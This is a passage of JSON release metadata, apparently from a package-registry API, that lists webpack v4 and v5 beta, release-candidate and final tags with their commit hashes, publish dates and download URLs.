purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v